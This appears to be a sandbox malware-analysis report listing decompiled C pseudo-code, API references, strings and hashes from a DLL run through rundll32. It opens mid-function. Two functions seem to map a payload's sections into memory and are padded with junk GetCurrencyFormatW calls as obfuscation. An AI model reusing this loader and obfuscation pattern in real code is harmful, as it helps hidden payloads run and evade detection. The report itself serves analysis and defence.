								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v20 =  &(_v20[1]);
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L18;
					}
					goto L26;
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002C19
GetCurrencyFormatW.KERNEL32 ref: 10002C32
GetCurrencyFormatW.KERNEL32 ref: 10002C4F
GetCurrencyFormatW.KERNEL32 ref: 10002C86
GetCurrencyFormatW.KERNEL32 ref: 10002CA2
GetCurrencyFormatW.KERNEL32 ref: 10002FD5
IsBadHugeReadPtr.KERNEL32(000022B9,-00000014), ref: 10002FE6

Strings

xadqsavcbdfewescGADW, xrefs: 10002BF8, 10002C23, 10002C40, 10002C7D, 10002C93, 10002CC3, 10002CEC, 10002D24, 10002D3E, 10002D73, 10002DA4, 10002DDA, 10002DF3, 10002E19, 10002E36, 10002E68, 10002E8F, 10002EAC, 10002EE0, 10002F09, 10002F3A, 10002F7A, 10002F8B, 10002FB9, 10002FCA
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002BE9, 10002BFF, 10002C04, 10002C2A, 10002C47, 10002C83, 10002C9A, 10002CCA, 10002CF3, 10002D2A, 10002D45, 10002D7A, 10002DAB, 10002DE4, 10002DFA, 10002E24, 10002E3D, 10002E6F, 10002E9A, 10002EB3, 10002EE7, 10002F10, 10002F41, 10002F80, 10002F92, 10002FBF, 10002FD1

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$HugeRead
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 393575760-3161301136
Opcode ID: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction ID: ead797fee4320dd8a6b32923dbdec08024b9b474de8a2ec407594d38246e10a8
Opcode Fuzzy Hash: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction Fuzzy Hash: 15D15971508205AFE304DF60CD96F6BBBE8EB8A788F11581DF6459B292C732E914CF25

Uniqueness

Uniqueness Score: -1.00%

Function 10001E51 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 314
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001E51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				int _t93;
				signed int _t94;
				signed int _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t147;
				short* _t160;
				signed int _t187;
				short* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t195 =  &_v20;
				_t194 = L"xadqsavcbdfewescGADW";
				_t160 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 =  *((intOrPtr*)(_a16 + 4));
				_v4 =  *(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a16 + 0x14) & 0x0000ffff;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc * 0x28 + _v4;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 + _v4 +  *_a16 + 0x18;
				_v8 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff) <= 0) {
					L11:
					return 1;
				}
				_v20 = _v4 + 0x10;
				do {
					_t93 = 0;
					if( *_v20 != 0) {
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _a8, _t94 *  *0x100440d0 +  *_v20 +  *((intOrPtr*)(_v20 + 4))) == 0) {
							L13:
							return 0;
						}
						_t108 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						_t109 = _v20;
						_t113 =  *((intOrPtr*)(_a16 + 0x1c))( *((intOrPtr*)(_t109 - 4)) + _v12, _t108 *  *0x100440d8 +  *_t109, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 4,  *((intOrPtr*)(_a16 + 0x34)));
						_t196 = _t195 + 0x14;
						if(_t113 == 0) {
							goto L13;
						}
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 +  *((intOrPtr*)(_v20 - 4)) + _v12;
						memcpy(_v16,  *((intOrPtr*)(_v20 + 4)) + _a4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc +  *_v20);
						_t195 = _t196 + 0xc;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 - 0x00000001 & _v16;
						 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4;
						L9:
						_t93 = 0;
						goto L10;
					}
					_t187 =  *((intOrPtr*)(_a12 + 0x38));
					_v4 = _t187;
					if(_t187 <= 0) {
						goto L10;
					}
					_t147 =  *((intOrPtr*)(_a16 + 0x1c))(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v20 - 4)) + _v12, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _v4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440dc + 4,  *((intOrPtr*)(_a16 + 0x34)));
					_t197 = _t195 + 0x14;
					if(_t147 == 0) {
						goto L13;
					}
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 - 4)) + _v12;
					 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 - 0x00000001 & _v16;
					memset(_v16, 0, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4);
					_t195 = _t197 + 0xc;
					goto L9;
					L10:
					_v8 = _v8 + 1;
					_v20 = _v20 + 0x28;
				} while (_v8 < GetCurrencyFormatW(_t93, 0x11d4, _t160, _t93, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff));
				goto L11;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E84
GetCurrencyFormatW.KERNEL32 ref: 10001EAE
GetCurrencyFormatW.KERNEL32 ref: 10001ECE
GetCurrencyFormatW.KERNEL32 ref: 10001EF9
GetCurrencyFormatW.KERNEL32 ref: 10001F53
GetCurrencyFormatW.KERNEL32 ref: 10001F6C
GetCurrencyFormatW.KERNEL32 ref: 10001F87
GetCurrencyFormatW.KERNEL32 ref: 10001FA1
GetCurrencyFormatW.KERNEL32 ref: 10001FD4
GetCurrencyFormatW.KERNEL32 ref: 10001FF8
GetCurrencyFormatW.KERNEL32 ref: 10002019
memset.MSVCRT ref: 1000202D
GetCurrencyFormatW.KERNEL32 ref: 10002045
GetCurrencyFormatW.KERNEL32 ref: 10002066
GetCurrencyFormatW.KERNEL32 ref: 10002096
GetCurrencyFormatW.KERNEL32 ref: 100020AF
GetCurrencyFormatW.KERNEL32 ref: 100020CA
GetCurrencyFormatW.KERNEL32 ref: 10002102
GetCurrencyFormatW.KERNEL32 ref: 10002126
memcpy.MSVCRT ref: 10002144
GetCurrencyFormatW.KERNEL32 ref: 100021A0

Strings

xadqsavcbdfewescGADW, xrefs: 10001E6A, 10001E6F, 10001EA3, 10001EC3, 10001EEA, 10001F4E, 10001F65, 10001F80, 10001F9A, 10001FCD, 10001FED, 1000200A, 10002040, 1000205F, 1000208F, 100020A8, 100020C3, 100020FB, 1000211B, 10002152, 10002167, 1000219B
(, xrefs: 10002191
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E5C, 10001E72, 10001E77, 10001EA6, 10001EC6, 10001EF2, 10001F50, 10001F68, 10001F83, 10001F9D, 10001FD0, 10001FF0, 1000200D, 10002042, 10002062, 10002092, 100020AB, 100020C6, 100020FE, 1000211E, 10002155, 1000216A, 1000219D

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$memcpymemset
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 2888895459-2712681272
Opcode ID: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction ID: 346e2bfed80208adbbea8c92dee40ae63694b643ed2e5d5183bbf84c561662e4
Opcode Fuzzy Hash: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction Fuzzy Hash: B1A159B1644344BFE208DB95CD86F2BBBECEB8AB48F011419F745DB2D1C671E9108B65

Uniqueness

Uniqueness Score: -1.00%

Function 10005EFE Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10005EFE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10045580; // 0x2ef01728
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1001FBC4(E10032F92, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E100056C3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10021022( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10020F40(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100056D9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E10005789(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E100057BF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10005DB0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10005CE3(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1001FBB5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10005F1D
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
GetVersion.KERNEL32 ref: 10006019
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000603E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10006063
_sscanf.LIBCMT ref: 10006083
ConvertDefaultLocale.KERNEL32(?), ref: 100060B8
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 100060BE
RegCloseKey.ADVAPI32(?), ref: 100060CD
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100060DD
EnumResourceLanguagesA.KERNEL32 ref: 100060F8
ConvertDefaultLocale.KERNEL32(?), ref: 10006129
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 1000612F
_memset.LIBCMT ref: 10006149

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 10006031
GetUserDefaultUILanguage, xrefs: 10005F46
kernel32.dll, xrefs: 10005F30
GetSystemDefaultUILanguage, xrefs: 10005F8F
ntdll.dll, xrefs: 100060D8

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction ID: 371a1abfdbbeaae06af34074570e4e6b8653269969333db2bd091179cc2368d9
Opcode Fuzzy Hash: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction Fuzzy Hash: 22818FB5D002299FEB11DFA5DC84AFFBAF5EB48351F20452AE944E7280D7789A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10002482 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 327
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E10002482(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				signed int _t117;
				signed int _t125;
				signed int _t150;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				short* _t178;
				short* _t222;
				void* _t223;

				_t223 =  &_v40;
				_t178 = L"xadqsavcbdfewescGADW";
				_t222 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v24 =  *(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a4 + 0x14) & 0x0000ffff;
				_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v24;
				_v40 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v24 +  *_a4 + 0x18;
				if(( *0x10046ab4 & 0x00000001) == 0) {
					 *0x10046ab4 =  *0x10046ab4 | 0x00000001;
					 *0x10046ab0 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0;
				}
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 +  *0x10046ab0 |  *(_v40 + 8);
				_v16 = E10001DB6(_v20, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_a4 + 0x3c)));
				_v24 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x28 + _v40);
				_t117 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
				_v40 = _v40 + 0x28;
				_v8 =  *(_v40 + 0x24);
				_v12 = _v24 + _t117 *  *0x100440d8;
				_v4 = 0;
				_v32 = 1;
				if(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff) <= 1) {
					L13:
					_v4 = 1;
					_t125 = E1000227A( &_v20, _a4);
					asm("sbb eax, eax");
					return  ~( ~_t125);
				} else {
					do {
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 +  *(_v40 + 8);
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24;
						_v36 = E10001DB6(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24,  *((intOrPtr*)(_a4 + 0x3c)));
						_v28 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v40);
						_v28 = _v28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0;
						if(_v16 == _v36 || _v12 + _v20 > GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v36) {
							if(( *(_v40 + 0x24) & GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
								L10:
								_t150 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 - 0x02000001 & ( *(_v40 + 0x24) | _v8);
								L11:
								_v8 = _t150;
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 - _v20 + _v28 + _v24;
								goto L12;
							}
							_t159 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
							_t160 = _v8;
							if((_t160 & _t159 *  *0x100440e0 + 0x02000000) == 0) {
								goto L10;
							}
							_t150 = _t160 |  *(_v40 + 0x24);
							goto L11;
						} else {
							if(E1000227A(_t223 + 0x28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x14, _a4) == 0) {
								return 0;
							}
							_v20 = _v24;
							_v16 = _v36;
							_t171 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t178 = L"xadqsavcbdfewescGADW";
							_v12 = _t171 *  *0x100440e0 + _v28;
							_v8 =  *(_v40 + 0x24);
						}
						L12:
						_v32 = _v32 + 1;
						_v40 = _v40 + 0x28;
					} while (_v32 < GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff));
					goto L13;
				}
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100024AA
GetCurrencyFormatW.KERNEL32 ref: 100024D4
GetCurrencyFormatW.KERNEL32 ref: 100024F4
GetCurrencyFormatW.KERNEL32 ref: 1000252B

Part of subcall function 10001DB6: GetCurrencyFormatW.KERNEL32 ref: 10001DCE

GetCurrencyFormatW.KERNEL32 ref: 10002545
GetCurrencyFormatW.KERNEL32 ref: 1000256B
GetCurrencyFormatW.KERNEL32 ref: 10002597
GetCurrencyFormatW.KERNEL32 ref: 100025C3
GetCurrencyFormatW.KERNEL32 ref: 100025FE
GetCurrencyFormatW.KERNEL32 ref: 10002628
GetCurrencyFormatW.KERNEL32 ref: 10002648
GetCurrencyFormatW.KERNEL32 ref: 1000267E

Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 100021FF
Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 10002222

GetCurrencyFormatW.KERNEL32 ref: 100026AA
GetCurrencyFormatW.KERNEL32 ref: 100026D7
GetCurrencyFormatW.KERNEL32 ref: 100026FE
GetCurrencyFormatW.KERNEL32 ref: 10002740
GetCurrencyFormatW.KERNEL32 ref: 10002772
GetCurrencyFormatW.KERNEL32 ref: 10002795
GetCurrencyFormatW.KERNEL32 ref: 100027C3
GetCurrencyFormatW.KERNEL32 ref: 100027EE
GetCurrencyFormatW.KERNEL32 ref: 1000281C

Strings

(, xrefs: 1000280B
xadqsavcbdfewescGADW, xrefs: 10002494, 10002499, 100024C9, 100024E9, 10002524, 1000253E, 10002560, 1000258C, 100025B8, 100025E3, 10002621, 1000263D, 10002673, 1000269F, 100026D0, 100026F7, 10002729, 1000274D, 1000276B, 1000278E, 100027BC, 100027E3, 10002815
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002486, 1000249C, 100024A1, 100024CC, 100024EC, 10002527, 10002541, 10002563, 1000258F, 100025BB, 100025EB, 10002624, 10002640, 10002676, 100026A2, 100026D3, 100026FA, 10002730, 1000276E, 10002791, 100027BF, 100027E6, 10002818

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction ID: aca6d6cc97a103aa38e8287a4bdca31c23581297dae163bc22dbee5c6a0af23b
Opcode Fuzzy Hash: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction Fuzzy Hash: 5DB16975648354BFE308CB50CD86F1BBBE8EB8AB48F11180EF7449A2D1C771E9508B65

Uniqueness

Uniqueness Score: -1.00%

